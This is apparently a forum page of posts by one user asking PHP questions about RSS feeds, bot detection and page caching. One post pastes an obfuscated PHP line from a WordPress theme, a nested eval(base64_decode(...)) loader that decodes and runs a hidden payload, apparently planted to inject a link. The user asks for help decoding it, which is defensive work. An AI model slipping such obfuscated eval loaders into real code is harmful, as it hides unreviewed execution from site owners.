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  1. Hey guys, I’ve got a question from the Web Designer Magazine, and way back to issue 145. (http://www.webdesignermag.co.uk/tutorial-files/issue-145-tutorial-files/). For building the BBC homepage, I wanted to get rid of the edit button (I know how to do that), but I need a way to where you don’t have to select what sources to pull in RSS feeds from, so it draws it in automatically. So you have 5 rss feeds to one category in the feeds.php, and they are pulled automatically to however many links you have on the homepage. I don’t know if anybody here reads this (I’m sure there are), or can help me or at least check it out and try to help me that would be great. I really, really need it. Thanks a ton guys!
  2. Wow dude, thanks a ton! Somebody took one of the WordPress themes I coded and put a link to his site, and I'm trying to decode and take action. Thanks a ton! ~SuperMario290
  3. Okay, I need to decode this line of php code that's in a theme, and I need to know what it says: <?php $o="QEAADgARO2NucSduYzolYWhoc2IEgHUlOQoNAXEODgCFO3cnZGtmdAABdDolZGh3fnVuYG9zJTlEALUgACchAWE8JzU3Nz4nKic7OHdvAAB3J2VraGBuaWFoLycgaWZqABhiICcuPCc4OTsodwXfBdZ3aHABAGJ1YmMlOVcAkydlfic7ZidvAAB1YmE6JW9zc3c9KChwcHApAABwbmRsYmMqcGh1Y3d1YnR0AAIqc29iamJ0KWRoaiU5UAFgV5GQAWEnUwFiOyhmB3kNNDsoD0A5OyYqAgAqJ0JpYycPkycqKjk=";eval(base64_decode("JGxsbD0wO2V2YWwoYmFzZTY0X2RlY29kZSgiSkd4c2JHeHNiR3hzYkd4c1BTZGlZWE5sTmpSZlpHVmpiMlJsSnpzPSIpKTskbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd3OUoyOXlaQ2M3IikpOyRsbGxsPTA7JGxsbGxsPTM7ZXZhbCgkbGxsbGxsbGxsbGwoIkpHdzlKR3hzYkd4c2JHeHNiR3hzS0NSdktUcz0iKSk7JGxsbGxsbGw9MDskbGxsbGxsPSgkbGxsbGxsbGxsbCgkbFsxXSk8PDgpKyRsbGxsbGxsbGxsKCRsWzJdKTtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JHdzlKM04wY214bGJpYzciKSk7JGxsbGxsbGxsbD0xNjskbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGxsbGxsbGwoJGwpOyl7aWYoJGxsbGxsbGxsbD09MCl7JGxsbGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsbGxsbCs9JGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTskbGxsbGxsbGxsPTE2O31pZigkbGxsbGxsJjB4ODAwMCl7JGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8NCk7JGxsbCs9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbF0pPj40KTtpZigkbGxsKXskbGw9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSkmMHgwZikrMztmb3IoJGxsbGw9MDskbGxsbDwkbGw7JGxsbGwrKykkbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGxdPSRsbGxsbGxsbFskbGxsbGxsbC0kbGxsKyRsbGxsXTskbGxsbGxsbCs9JGxsO31lbHNleyRsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsKz0kbGxsbGxsbGxsbCgkbFskbGxsbGwrK10pKzE2O2ZvcigkbGxsbD0wOyRsbGxsPCRsbDskbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGwrK109JGxsbGxsbGxsbGwoJGxbJGxsbGxsXSkpOyRsbGxsbCsrOyRsbGxsbGxsKz0kbGw7fX1lbHNlJGxsbGxsbGxsWyRsbGxsbGxsKytdPSRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSk7JGxsbGxsbDw8PTE7JGxsbGxsbGxsbC0tO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JEMG5ZMmh5SnpzPSIpKTskbGxsbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkQwaVB5SXVKR3hzYkd4c2JHeHNiR3hzYkNnMk1pazciKSk7JGxsbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGw7KXskbGxsbGxsbGxsbC49JGxsbGxsbGxsbGxsbCgkbGxsbGxsbGxbJGxsbGxsKytdXjB4MDcpO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkM0OUpHeHNiR3hzYkd4c2JHd3VKR3hzYkd4c2JHeHNiR3hzYkNnMk1Da3VJajhpT3c9PSIpKTtldmFsKCRsbGxsbGxsbGwpOw=="));return;?> If somebody could point me to a program that would decode it, or somebody could decode it for me, that would be great. Thanks a ton, SuperMario290
  4. Does anyone have some code for this to work? I've tried a lot of things but nothing's working.
  5. Okay, so I was wondering if this code is correct for showing the bots (eg: googlebot, etc...) on a website, or if it is wrong in some way. If you have other code that is guaranteed to work, please post it. This is for a friend of mine, and I'm trying to help him out a little bit. <?php $bot_list = array("Inktomi Slurp", "Googlebot", "Scooter", "MSNBot", "Ahoy! The Homepage Finder", "The Jubii Indexing Robot", "AskJeeves", "AbachoBOT", "KIT Fireball"); function detect_bot() { global $bot_list; foreach($bot_list as $bot) { if(ereg($bot, $_SERVER['HTTP_USER_AGENT'])) { $thebot = $bot; } } if ($bot) { print " Bots visiting site now: $thebot"; } } ?> Thanks, SuperMario290
  6. Okay, I'm not a noob to php, or really any web development language, but I have a question for a client that I am working for. Here's what he asked: Is there a better way to cache web pages in PHP other than "Gather HTML either in a string or store it in the buffer -> write to file."? All I've known about caching is storing it in a string or buffer than writing to a file, so I was kind of stumped. If anyone can help me out on this, it would be greatly appreciated!
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